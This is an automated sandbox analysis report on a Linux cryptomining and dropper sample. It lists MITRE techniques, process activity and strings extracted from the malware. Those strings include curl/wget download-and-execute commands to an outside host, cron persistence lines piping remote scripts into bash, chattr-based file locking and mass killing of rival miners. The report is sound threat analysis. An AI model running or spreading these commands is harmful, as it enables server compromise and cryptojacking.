Loading ...

Play interactive tourEdit tour

Analysis Report pcXrXrdEB2

Overview

General Information

Joe Sandbox Version:25.0.0
Analysis ID:784804
Start date:11.02.2019
Start time:08:42:09
Joe Sandbox Product:Cloud
Overall analysis duration:0h 7m 23s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:pcXrXrdEB2
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:CentOS Linux 7.5 x64 (Kernel 3.10.0-862, Firefox 52.8.0, Document Viewer 3.22.1, LibreOffice 5.3.6.1, OpenJDK 1.8.0_171)
Detection:MAL
Classification:mal68.spre.troj.evad.mine.lin@0/10@12/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold680 - 100Report FP / FNfalsemalicious

Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsLocal Job Scheduling11Local Job Scheduling11Port MonitorsMasquerading1Credential DumpingProcess Discovery1Application Deployment SoftwareData from Local SystemData CompressedUncommonly Used Port1
Replication Through Removable MediaCommand-Line Interface1Hidden Files and Directories1Accessibility FeaturesHidden Files and Directories1Network SniffingSecurity Software Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Non-Application Layer Protocol2
Drive-by CompromiseScripting1Accessibility FeaturesPath InterceptionFile Permissions Modification11Input CaptureSystem Information Discovery3Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol2
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingScripting1Credentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessFile Deletion1Account ManipulationRemote System DiscoveryShared WebrootData StagedScheduled TransferStandard Cryptographic Protocol
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceIndicator Removal on Host11Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port

Signature Overview

Click to jump to signature section


Bitcoin Miner:

barindex
Found strings related to Crypto-MiningShow sources
Source: pcXrXrdEB2String found in binary or memory: rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
Source: pcXrXrdEB2String found in binary or memory: pkill -f cryptonight
Source: pcXrXrdEB2String found in binary or memory: pkill -f xmrigDaemon
Reads CPU information from /sys indicative of miner or evasive malwareShow sources
Source: /bin/pkill (PID: 9338)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9350)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9411)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9419)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9431)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9454)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9463)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9482)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9490)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9502)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9527)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9546)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9571)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9578)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9585)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9604)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9630)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9654)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9660)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9671)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9677)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9704)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9711)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9723)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9732)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9739)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9754)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9779)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9794)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9808)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9817)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9832)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9837)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9845)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9852)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9871)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9882)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9903)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9923)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9930)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9937)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9944)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9962)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9969)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9979)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 9992)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10000)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10017)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10030)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10044)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10051)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10063)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10071)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10090)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10108)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10126)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10133)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10144)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10153)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10160)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10167)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10175)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10194)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10202)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /bin/pkill (PID: 10221)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/r1x (PID: 13009)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/lib/polkit-1/polkitd (PID: 9953)Reads CPU info from /sys: /sys/devices/system/cpu/online

Spreading:

barindex
Found strings indicative of a multi-platform dropperShow sources
Source: pcXrXrdEB2String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/86 -o /var/tmp/r1x||wget http://yxarsh.shop/86 -O /var/tmp/r1x) && chmod +x /var/tmp/r1x
Source: pcXrXrdEB2String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/64 -o /tmp/r1x||wget http://yxarsh.shop/64 -O /tmp/r1x) && chmod +x /tmp/r1x
Source: pcXrXrdEB2String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/0 -o /usr/local/bin/dns||wget http://yxarsh.shop/0 -O /usr/local/bin/dns) && chmod 755 /usr/local/bin/dns && touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns
Source: pcXrXrdEB2String: echo -e "*/10 * * * * root (curl -fsSL http://yxarsh.shop/1.jpg||wget -q -O- http://yxarsh.shop/1.jpg)|bash -sh\n##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root
Source: pcXrXrdEB2String: echo -e "*/17 * * * * root (curl -fsSL http://yxarsh.shop/1.jpg||wget -q -O- http://yxarsh.shop/1.jpg)|bash -sh\n##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache
Source: pcXrXrdEB2String: echo -e "*/23 * * * * (curl -fsSL http://yxarsh.shop/1.jpg||wget -q -O- http://yxarsh.shop/1.jpg)|bash -sh\n##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root
Source: pcXrXrdEB2String: echo -e "*/31 * * * * (curl -fsSL http://yxarsh.shop/1.jpg||wget -q -O- http://yxarsh.shop/1.jpg)|bash -sh\n##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root
Source: pcXrXrdEB2String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/0 -o /etc/cron.hourly/oanacroner||wget http://yxarsh.shop/0 -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner
Source: pcXrXrdEB2String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/0 -o /etc/cron.daily/oanacroner||wget http://yxarsh.shop/0 -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner
Source: pcXrXrdEB2String: (curl -fsSL --connect-timeout 120 http://yxarsh.shop/0 -o /etc/cron.monthly/oanacroner||wget http://yxarsh.shop/0 -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.101:55998 -> 198.35.45.242:26750
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /0 HTTP/1.1User-Agent: curl/7.29.0Host: yxarsh.shopAccept: */*
Source: global trafficHTTP traffic detected: GET /0 HTTP/1.1User-Agent: curl/7.29.0Host: yxarsh.shopAccept: */*
Source: global trafficHTTP traffic detected: GET /0 HTTP/1.1User-Agent: curl/7.29.0Host: yxarsh.shopAccept: */*
Source: global trafficHTTP traffic detected: GET /0 HTTP/1.1User-Agent: curl/7.29.0Host: yxarsh.shopAccept: */*
Source: global trafficHTTP traffic detected: GET /64 HTTP/1.1User-Agent: curl/7.29.0Host: yxarsh.shopAccept: */*
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: yxarsh.shop
Urls found in memory or binary dataShow sources
Source: pcXrXrdEB2String found in binary or memory: http://yxarsh.shop/0
Source: pcXrXrdEB2String found in binary or memory: http://yxarsh.shop/1.jpg
Source: pcXrXrdEB2String found in binary or memory: http://yxarsh.shop/1.jpg)
Source: pcXrXrdEB2String found in binary or memory: http://yxarsh.shop/64
Source: pcXrXrdEB2String found in binary or memory: http://yxarsh.shop/86

System Summary:

barindex
Sample contains strings that are potentially command stringsShow sources
Source: Initial samplePotential command found: pkill -f sourplum
Source: Initial samplePotential command found: pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
Source: Initial samplePotential command found: rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
Source: Initial samplePotential command found: rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
Source: Initial samplePotential command found: rm -rf /tmp/*index_bak*
Source: Initial samplePotential command found: rm -rf /tmp/*httpd.conf*
Source: Initial samplePotential command found: rm -rf /tmp/*httpd.conf
Source: Initial samplePotential command found: rm -rf /tmp/a7b104c270
Source: Initial samplePotential command found: pkill -f kworkerds
Source: Initial samplePotential command found: pkill -f biosetjenkins
Source: Initial samplePotential command found: pkill -f AnXqV.yam
Source: Initial samplePotential command found: pkill -f xmrigDaemon
Source: Initial samplePotential command found: pkill -f xmrigMiner
Source: Initial samplePotential command found: pkill -f xmrig
Source: Initial samplePotential command found: pkill -f Loopback
Source: Initial samplePotential command found: pkill -f apaceha
Source: Initial samplePotential command found: pkill -f cryptonight
Source: Initial samplePotential command found: pkill -f stratum
Source: Initial samplePotential command found: pkill -f mixnerdx
Source: Initial samplePotential command found: pkill -f performedl
Source: Initial samplePotential command found: pkill -f JnKihGjn
Source: Initial samplePotential command found: pkill -f irqba2anc1
Source: Initial samplePotential command found: pkill -f irqba5xnc1
Source: Initial samplePotential command found: pkill -f irqbnc1
Source: Initial samplePotential command found: pkill -f ir29xc1
Source: Initial samplePotential command found: pkill -f conns
Source: Initial samplePotential command found: pkill -f irqbalance
Source: Initial samplePotential command found: pkill -f crypto-pool
Source: Initial samplePotential command found: pkill -f minexmr
Source: Initial samplePotential command found: pkill -f XJnRj
Source: Initial samplePotential command found: pkill -f NXLAi
Source: Initial samplePotential command found: pkill -f BI5zj
Source: Initial samplePotential command found: pkill -f askdljlqw
Source: Initial samplePotential command found: pkill -f minerd
Source: Initial samplePotential command found: pkill -f minergate
Source: Initial samplePotential command found: pkill -f Guard.sh
Source: Initial samplePotential command found: pkill -f ysaydh
Source: Initial samplePotential command found: pkill -f bonns
Source: Initial samplePotential command found: pkill -f donns
Source: Initial samplePotential command found: pkill -f kxjd
Source: Initial samplePotential command found: pkill -f Duck.sh
Source: Initial samplePotential command found: pkill -f bonn.sh
Source: Initial samplePotential command found: pkill -f conn.sh
Source: Initial samplePotential command found: pkill -f kworker34
Source: Initial samplePotential command found: pkill -f kw.sh
Source: Initial samplePotential command found: pkill -f pro.sh
Source: Initial samplePotential command found: pkill -f polkitd
Source: Initial samplePotential command found: pkill -f acpid
Source: Initial samplePotential command found: pkill -f icb5o
Source: Initial samplePotential command found: pkill -f nopxi
Source: Initial samplePotential command found: pkill -f irqbalanc1
Source: Initial samplePotential command found: pkill -f i586
Source: Initial samplePotential command found: pkill -f gddr
Source: Initial samplePotential command found: pkill -f mstxmr
Source: Initial samplePotential command found: pkill -f ddg.2011
Source: Initial samplePotential command found: pkill -f wnTKYg
Source: Initial samplePotential command found: pkill -f deamon
Source: Initial samplePotential command found: pkill -f disk_genius
Source: Initial samplePotential command found: pkill -f bashx
Source: Initial samplePotential command found: pkill -f bashg
Source: Initial samplePotential command found: pkill -f bashe
Source: Initial samplePotential command found: pkill -f bashf
Source: Initial samplePotential command found: pkill -f bashh
Source: Initial samplePotential command found: pkill -f XbashY
Source: Initial samplePotential command found: pkill -f libapache
Source: Initial samplePotential command found: pkill -f qW3xT.2
Source: Initial samplePotential command found: pkill -f /usr/bin/.sshd
Source: Initial samplePotential command found: pkill -f sustes
Source: Initial samplePotential command found: pkill -f Xbash
Source: Initial samplePotential command found: rm -rf /var/tmp/j*
Source: Initial samplePotential command found: rm -rf /tmp/j*
Source: Initial samplePotential command found: rm -rf /var/tmp/java
Source: Initial samplePotential command found: rm -rf /tmp/java
Source: Initial samplePotential command found: rm -rf /var/tmp/java2
Source: Initial samplePotential command found: rm -rf /tmp/java2
Source: Initial samplePotential command found: rm -rf /var/tmp/java*
Source: Initial samplePotential command found: rm -rf /tmp/java*
Source: Initial samplePotential command found: rm -rf /tmp/httpd.conf
Source: Initial samplePotential command found: rm -rf /tmp/conn
Source: Initial samplePotential command found: rm -rf /tmp/.uninstall* /tmp/.python* /tmp/.tables* /tmp/.mas
Source: Initial samplePotential command found: rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
Source: Initial samplePotential command found: chattr -i /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-*
Source: Initial samplePotential command found: rm -rf /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-* .systemd-private-*
Source: Initial samplePotential command found: chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
Source: Initial samplePotential command found: chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
Source: Initial samplePotential command found: chattr -i /bin/nfstruncate && rm -rf /bin/nfstruncate
Source: Initial samplePotential command found: rm -rf /etc/rc*.d/S01nfstruncate /etc/rc.d/rc*.d/S01nfstruncate
Source: Initial samplePotential command found: chattr -i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc*.d/S01acpidtd /etc/rc*.d/S01acpidtd /etc/ld.sc.conf
Source: Initial samplePotential command found: rm -rf /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc*.d/S01acpidtd /etc/rc*.d/S01acpidtd /etc/ld.sc.conf
Source: Initial samplePotential command found: mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
Source: Initial samplePotential command found: touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
Source: Initial samplePotential command found: chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
Source: Initial samplePotential command found: chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
Source: Initial samplePotential command found: ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9
Source: Initial samplePotential command found: ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
Source: Initial samplePotential command found: ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
Source: Initial samplePotential command found: ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
Source: Initial samplePotential command found: ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
Source: Initial samplePotential command found: ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
Source: Initial samplePotential command found: ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
Sample tries to kill a process (SIGKILL)Show sources
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 689, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9917, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9926, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9935, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9941, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9948, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9956, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9960, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9967, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9975, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9981, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9986, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 9995, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10001, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10006, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10013, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10019, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10025, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10033, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10040, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10045, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10053, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10058, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10065, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10072, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10078, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10086, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10092, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10097, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10106, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10111, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10118, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10124, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10130, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10138, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10148, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10154, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10162, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10169, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10180, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10184, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10188, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10197, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10206, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10211, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10215, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10225, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10231, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10239, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10244, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10249, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10259, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10264, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10272, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10277, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10285, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10294, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10299, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10307, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10315, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10321, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10326, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10333, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10341, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10348, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10356, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10362, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10370, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10376, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10385, result: successful
Source: /bin/kill (PID: 10454)SIGKILL sent: pid: 10390, result: successful
Classification labelShow sources
Source: classification engineClassification label: mal68.spre.troj.evad.mine.lin@0/10@12/0

Persistence and Installation Behavior:

barindex
Protects files from modificationShow sources
Source: /bin/bash (PID: 10411)Args: chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
Source: /bin/bash (PID: 12109)Args: chattr +i /usr/local/bin/dns
Source: /bin/bash (PID: 12126)Args: chattr +i /etc/cron.d/root
Source: /bin/bash (PID: 12141)Args: chattr +i /etc/cron.d/apache
Source: /bin/bash (PID: 12155)Args: chattr +i /var/spool/cron/root
Source: /bin/bash (PID: 12176)Args: chattr +i /var/spool/cron/crontabs/root
Sample tries to persist itself using cronShow sources
Source: /bin/bash (PID: 9334)File: /etc/crontab
Source: /bin/bash (PID: 9334)File: /etc/cron.d/root
Source: /bin/bash (PID: 9334)File: /etc/cron.d/apache
Source: /bin/bash (PID: 9334)File: /var/spool/cron/root
Source: /bin/bash (PID: 9334)File: /var/spool/cron/crontabs/root
Source: /bin/curl (PID: 12198)File: /etc/cron.hourly/oanacroner
Source: /bin/curl (PID: 12403)File: /etc/cron.daily/oanacroner
Source: /bin/curl (PID: 12542)File: /etc/cron.monthly/oanacroner
Creates hidden files and/or directoriesShow sources
Source: /usr/lib/polkit-1/polkitd (PID: 9953)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 10373)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 10540)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 10667)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 10807)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 10935)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 11087)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 11209)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 11332)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 11465)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 11545)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 11663)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 11729)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 11807)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 11894)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 11985)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12051)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12065)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12079)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12093)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12177)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12243)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12332)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12346)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12360)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12374)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12388)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12442)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12457)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12471)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12485)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12499)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12513)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12527)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12531)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12596)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12610)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12624)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12638)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12652)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12666)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12680)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12696)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12787)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12876)Directory: /.cache
Source: /usr/bin/pkla-check-authorization (PID: 12896)Directory: /.cache
